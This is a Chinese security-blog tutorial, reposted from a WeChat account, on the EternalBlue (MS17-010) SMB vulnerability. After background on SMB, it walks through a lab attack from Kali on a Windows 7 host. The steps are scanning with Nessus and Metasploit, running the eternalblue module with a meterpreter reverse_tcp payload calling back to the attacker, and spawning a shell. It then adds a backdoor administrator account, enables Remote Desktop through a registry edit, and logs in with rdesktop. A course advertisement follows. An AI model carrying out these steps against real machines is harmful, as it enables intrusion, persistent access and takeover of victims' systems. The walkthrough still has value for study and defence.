漏洞考古之永恒之蓝原理及利用

admin 2022年9月8日15:16:36安全文章评论10 views2884字阅读9分36秒阅读模式
漏洞考古之永恒之蓝原理及利用
漏洞考古之永恒之蓝原理及利用

点击上方蓝字关注我们

漏洞考古之永恒之蓝原理及利用


漏洞考古之永恒之蓝原理及利用
1

免责声明


      本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,遵守国家相关法律法规,请勿用于违法用途如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。


2

内容速览

永恒之蓝漏洞利用及攻击

1.基础知识介绍

什么是永恒之蓝漏洞?

  永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,
“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,
英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

2.什么是SMB协议?

    SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间
共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,
SMB使用TCP139端口和TCP445端口。

3.SMB工作原理是什么?

 (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望
使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。

(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户
名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。

(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个
TconX应答数据报以表示此次连接是否接收或拒绝。

(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过
close SMB关闭文件。

2.实验环境准备

1.使用kali作为攻击机,windows7(旗舰版)作为靶机,靶机IP地址未知,但kali和靶机均在同一个网段,可ping通

2.kali的地址为自动获取

3.本次实验还可以用到Nessus对靶机系统进行扫描,确认有无永恒之蓝漏洞 4.获取kali自身的IP地址 使用命令 ifconfig,和windows版本不同。windows下查看IP命令为ipconfig

查看如图:漏洞考古之永恒之蓝原理及利用可以看到,kali的IP地址为192.168.219.129 接下来,使用kali命令netdiscover对网络存活主机进行发现漏洞考古之永恒之蓝原理及利用一般情况下,第一个IP地址和最后一个IP地址可能性并不大 5.登录Nessus,对靶机系统进行扫描,确认有无永恒之蓝漏洞漏洞考古之永恒之蓝原理及利用登录进来后,创建一个新扫描漏洞考古之永恒之蓝原理及利用一般选择Basic Network Scan或者Advanced Scan就可以很好的扫描目标系统 创建一个新扫描,输入名称和要扫描IP,进行扫描,扫描将花费几分钟的时间,请耐心等待漏洞考古之永恒之蓝原理及利用6.使用msf对永恒之蓝漏洞进行利用和攻击 在扫描结果发现了如下漏洞,证明其存在永恒之蓝漏洞,可以进行破解(MS17-010为永恒之蓝漏洞编号)漏洞考古之永恒之蓝原理及利用1.在kali下输入命令msfconsole启动msf 如图:出现以下界面则表示启动成功漏洞考古之永恒之蓝原理及利用2.搜索ms17_010:search ms17_010漏洞考古之永恒之蓝原理及利用其中auxil iary/ scanner/ smb/ smb/ms17010为扫描模块,用于对目标是否存在永恒之蓝漏洞进行确认exploit /wi ndows/ smb/ms17 010 eternalblue为攻击模块,用于对存在永恒之蓝漏洞的目标进行攻击

3.使用use auxiliary/scanner/smb/smb_ms17_010模块进行分析漏洞考古之永恒之蓝原理及利用4.使用show options查看模块情况漏洞考古之永恒之蓝原理及利用此时如果不知道应该使用什么命令,则输入options来获得帮助漏洞考古之永恒之蓝原理及利用在此,只关注两个命令:RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描

5.设置攻击地址,并run运行,提示貌似存在永恒之蓝漏洞(MS17-010)

set RHOST 目标IP地址             
run 运行

漏洞考古之永恒之蓝原理及利用

标红处说明这里貌似存在永恒之蓝漏洞,使用msf这样做也可以达到一个确认是否存在永恒之蓝漏洞的功能

设置攻击模块,并设置攻击IP地址,并run运行

6.输入 use exploit/windows/smb/ms17_010_eternalblue选择攻击模块进行攻击

设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp

设置监听主机(kali):set lhost kali的IP地址

利用exploit进行攻击:exploit漏洞考古之永恒之蓝原理及利用

当出现 meterpreter > 时,则说明攻击成功漏洞考古之永恒之蓝原理及利用

漏洞利用

1.显示远程主机系统信息:sysinfo漏洞考古之永恒之蓝原理及利用2.查看用户身份:getuid漏洞考古之永恒之蓝原理及利用3.对远程主机当前屏幕进行截图:screenshot漏洞考古之永恒之蓝原理及利用4.获得shell控制台:shell漏洞考古之永恒之蓝原理及利用5.输入chcp 65001即可消除乱码漏洞考古之永恒之蓝原理及利用6.新建一个用户 名为test,密码为123456,并提升为管理员用户

net user test 123456 /add  创建test用户,密码为:123456

net localgroup administrators test /add  将test用户拉入管理员组,提升为管理员用户

漏洞考古之永恒之蓝原理及利用7.使用REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f2打开被攻击主机远程登录端口漏洞考古之永恒之蓝原理及利用8.在kali中使用rdesktop 目标的ip地址进行远程连接,用户名和密码为刚才新建的test用户漏洞考古之永恒之蓝原理及利用顺利弹出远程连接窗口,输入账号密码漏洞考古之永恒之蓝原理及利用自此,利用永恒之蓝漏洞攻击一台主机就结束了,现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了漏洞考古之永恒之蓝原理及利用

漏洞考古之永恒之蓝原理及利用

如果想要系统学习网络安全技术

不妨加入知识星球课程

《60天入门网络安全渗透测试》

从入门到案例,贴合实战

轻松易懂、好玩实用

限时领取

漏洞考古之永恒之蓝原理及利用知识星球漏洞考古之永恒之蓝原理及利用

漏洞考古之永恒之蓝原理及利用

漏洞考古之永恒之蓝原理及利用优惠券漏洞考古之永恒之蓝原理及利用

漏洞考古之永恒之蓝原理及利用


跟着60天入门学习路线一起学

期待你的到来!


漏洞考古之永恒之蓝原理及利用


往期推荐



从入门到入狱的技术,可以学,别乱用!

网络安全学习方向和资源整理(建议收藏)

一个web安全工程师的基础学习规划

资源 | 渗透测试工程师入门教程(限时领取)

5年老鸟推荐10个玩Python必备的网站

推荐十个成为网络安全渗透测试大佬的学习必备网站!

那些社工师不为人知的秘密。。。



更多内容请关注公众号

网络安全自修室

漏洞考古之永恒之蓝原理及利用
漏洞考古之永恒之蓝原理及利用

点个在看你最好看

漏洞考古之永恒之蓝原理及利用


原文始发于微信公众号(网络安全自修室):漏洞考古之永恒之蓝原理及利用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月8日15:16:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  漏洞考古之永恒之蓝原理及利用 http://cn-sec.com/archives/1285866.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: